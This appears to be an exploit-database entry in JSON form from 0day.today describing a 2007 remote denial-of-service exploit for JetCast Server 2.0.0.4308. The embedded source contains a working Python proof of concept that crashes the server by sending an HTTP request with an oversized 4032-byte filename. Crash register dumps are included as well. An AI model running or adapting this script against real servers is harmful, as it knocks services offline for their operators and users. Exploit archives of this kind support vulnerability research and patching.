Description
Exploit for unknown platform in category dos / poc
{"id": "1337DAY-ID-6450", "type": "zdt", "bulletinFamily": "exploit", "title": "JetCast Server 2.0.0.4308 Remote Denial of Service Exploit", "description": "Exploit for unknown platform in category dos / poc", "published": "2007-09-08T00:00:00", "modified": "2007-09-08T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/6450", "reporter": "vCore", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-03-19T13:11:43", "viewCount": 8, "enchantments": {"score": {"value": -0.2, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.2}, "sourceHref": "https://0day.today/exploit/6450", "sourceData": "==========================================================\r\nJetCast Server 2.0.0.4308 Remote Denial of Service Exploit\r\n==========================================================\r\n\r\n\r\n#!/usr/bin/python\r\n\"\"\" ____\r\n__ __/ ___|___ _ __ ___\r\n\\ \\ / / | / _ \\| '__/ _ \\\r\n \\ V /| |__| (_) | | | __/\r\n \\_/ \\____\\___/|_| \\___| _\r\n _ __ _ __ ___ ___ ___ _ __ | |_ ___ _\r\n| '_ \\| '__/ _ \\/ __|/ _ \\ '_ \\| __/ __| |_|\r\n| |_) | | | __/\\__ \\ __/ | | | |_\\__ \\ _\r\n| .__/|_| \\___||___/\\___|_| |_|\\__|___/ |_|\r\n|_| _\r\n _ //\r\n \\\\//\r\nGENRE: //\\\\PLOIT\r\n // `\r\nPROGRAM: JetCast Server 2.0.0.4308\r\nEXPLOiT TYPE: 0day remote DoS exploit\r\nEXPLOiT LANGUAGE: Python\r\nDEBUG iNFO: [Module JSMP3OGG]\r\n EAX 100355B8 JSMP3OGG.100355B8\r\n ECX 00000007\r\n EDX 00002000\r\n EBX 00CB415A\r\n ESP 00DCDEC0\r\n EBP 00DCDECC\r\n ESI 00000000\r\n EDI 1002FA64 ASCII \"Mozilla\"\r\n EIP 1002737C JSMP3OGG.1002737C\r\n\r\n MOV AH,BYTE PTR DS:[ESI]; C0000005 (ACCESS VIOLATION)\r\n\r\nBug found / exploit written by vCore <[email\u00a0protected]>\r\nTested on JetCast Server 2.0.0.4308 - Windows XP ServicePack2\r\n ____ _\r\n / ___|_ __| | ___ _\r\n| | / _ \\ / _` |/ _ \\ |_|\r\n| |__| (_) | (_| | __/ _\r\n \\____\\___/ \\__,_|\\___| |_|\r\n\r\n\"\"\"\r\nfrom time import sleep\r\nfrom socket import *\r\n\r\ntarget = '127.0.0.1'\r\nport = 8000\r\nbuf = \"A\" * 4032\r\n\r\nheader = (\r\n 'GET /%s.mp3 HTTP/1.0\\r\\n'\r\n 'Host: %s\\r\\n'\r\n 'User-Agent: WinampMPEG/5.19\\r\\n'\r\n 'Accept: */*\\r\\n'\r\n 'Icy-MetaData:1\\r\\n'\r\n 'Connection: close\\r\\n') % (buf, target)\r\n\r\ns = socket(AF_INET, SOCK_STREAM)\r\ns.connect((target, port))\r\ns.send(header)\r\nsleep(2)\r\ns.close()\r\n\r\nprint \"DONE\"\r\n\r\n\r\n\n# 0day.today [2018-03-19] #", "_state": {"dependencies": 1645297537, "score": 1659766679, "epss": 1678811959}}
{}